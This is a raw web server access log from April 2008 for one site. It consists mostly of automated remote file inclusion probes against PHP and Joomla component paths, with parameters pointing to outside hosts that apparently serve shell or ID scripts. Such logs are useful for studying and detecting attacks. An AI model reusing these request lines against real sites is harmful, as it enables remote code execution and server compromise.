208.79.239.236 - - [01/Apr/2008:06:21:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:21:17 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:21:37 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:21:37 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:21:38 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:06:21:41 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:06:21:41 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:06:21:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:22:06 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:22:06 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:22:06 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:06:22:16 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.118 - - [01/Apr/2008:06:22:25 -0700] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:22:51 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:22:51 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.108.64.152 - - [01/Apr/2008:06:22:55 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:06:23:48 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:24:09 -0700] "GET /logs/access_080125.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:24:09 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:24:10 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:24:19 -0700] "GET /index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:24:20 -0700] "GET /index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:06:24:20 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:06:24:36 -0700] "GET /index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:25:02 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:25:16 -0700] "GET /logs//atom.php5?page=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:25:16 -0700] "GET //atom.php5?page=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:25:43 -0700] "GET /logs/access.log/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:25:44 -0700] "GET /logs/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:26:02 -0700] "GET /logs/access_080103.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:06:26:46 -0700] "GET /logs/access_080125.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:06:27:07 -0700] "GET /logs/access.log/index.php?option=com_restaurante&task=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:28:10 -0700] "GET /logs/access_071227.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:28:10 -0700] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:28:10 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.51.158 - - [01/Apr/2008:06:29:07 -0700] "GET /davep/?N=A HTTP/1.0" 200 647 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:29:22 -0700] "GET /logs/access_080211.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:29:53 -0700] "GET /logs/access_080215.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:29:53 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:29:53 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:29:53 -0700] "GET /logs/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:29:54 -0700] "GET //modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:29:54 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [01/Apr/2008:06:29:56 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:06:30:24 -0700] "GET /logs/access_080112.log/bemarket/postscript/postscript.php?p_mode=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:06:30:25 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:06:30:25 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:26 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:26 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:26 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:31 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:31 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:30:31 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:30:37 -0700] "GET /logs/access_080312.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:30:41 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:30:51 -0700] "GET /logs/access_080112.log/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:30:52 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:07 -0700] "GET /logs/access_080119.log//components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:07 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:07 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:31:17 -0700] "GET /logs/access_080219.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:17 -0700] "GET /logs/access_080119.log//components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:17 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:31:17 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:26 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:31 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:39 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:40 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:47 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:48 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:31:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:31:55 -0700] "GET /logs/access_080119.log//components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:31:56 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:06:31:56 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:32:03 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:32:03 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:32:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:32:39 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:32:52 -0700] "GET /logs/access.log//atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:32:52 -0700] "GET //atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:32:53 -0700] "GET /logs//atom.php5?page=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:33:19 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:33:20 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:33:28 -0700] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:32 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:33 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:37 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:37 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:33:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:06:34:26 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:06:34:26 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:06:35:10 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:06:35:11 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:35:24 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:35:25 -0700] "GET //ashnews.php?pathtoashnews=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:35:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:36:18 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:36:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:06:36:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:36:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [01/Apr/2008:06:36:54 -0700] "GET /logs/access_080225.log/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [01/Apr/2008:06:36:55 -0700] "GET /?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 3362 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [01/Apr/2008:06:36:55 -0700] "GET /logs/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 200 41264 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [01/Apr/2008:06:36:55 -0700] "GET /logs/access_080313.log/?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:37:07 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:37:23 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:37:31 -0700] "GET //skin/zero_vote/error.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:37:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:36 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:36 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:37:37 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [01/Apr/2008:06:37:41 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.8.66 - - [01/Apr/2008:06:37:46 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://emptyhearts.net/entropybanner/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:06:37:46 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
